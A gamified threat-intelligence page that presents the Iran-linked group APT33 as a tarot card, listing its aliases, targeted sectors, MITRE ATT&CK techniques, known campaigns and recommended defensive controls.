← Home·Gallery·Techniques
Threat Intelligence Tarot
Major Arcana · 11
Iran (IRGC-affiliated)
G0064
risk 4/5
The Flame Keeper
APT33
Elfin · Refined Kitten · Magnallium · HOLMIUM
AviationEnergyPetrochemicalSaudi ArabiaUS defense
Active since ~2013 · Espionage, Sabotage, Destabilization
It was born of regional rivalry - a tool to burn what it cannot own. The Flame Keeper watches petrochemical plants and aviation systems with patient hostility, waiting for the instruction to ignite.
Tactics & Techniques
RCN
RDV
INI
EXC
PRS
PRV
EVA
CRD
DSC
LAT
COL
C2
EXF
IMP
T1566.001
Spearphishing Attachment
Initial Access
T1059.001
PowerShell
Execution
T1486
Data Encrypted for Impact
Impact
T1204.002
Malicious File
Execution
T1134
Access Token Manipulation
Privilege Escalation
Notable Operations
  • Shamoon 2 campaign (linked, Saudi Aramco targeting)
  • Aviation sector credential harvesting
  • US defense contractor targeting
  • Leafminer / Raspite malware deployment
Defenses
  • OT/ICS monitoring for petrochemical and energy environments
    IEC 62443
  • Application whitelisting on industrial workstations
    CIS Control 2
  • Macro and script execution controls on endpoints
    CIS Control 10
  • Threat intelligence feeds covering Iranian TTPs
    NIST CSF: ID.RA
Reversed: Their Weakness
APT33's use of commodity tools and publicly available malware complicates attribution - a double-edged sword. When investigators can't confirm the actor, the political pressure on Iran is reduced.

Share this adversary profile

swipe to browse

← PreviousThe WhispererNext →The Oracle
Related Adversaries
The Specter
Lazarus Group
5 shared TTPs
The Hospitality Thief
FIN8
4 shared TTPs
The Broker
TA505
4 shared TTPs
Data sourced from MITRE ATT&CK. For educational purposes.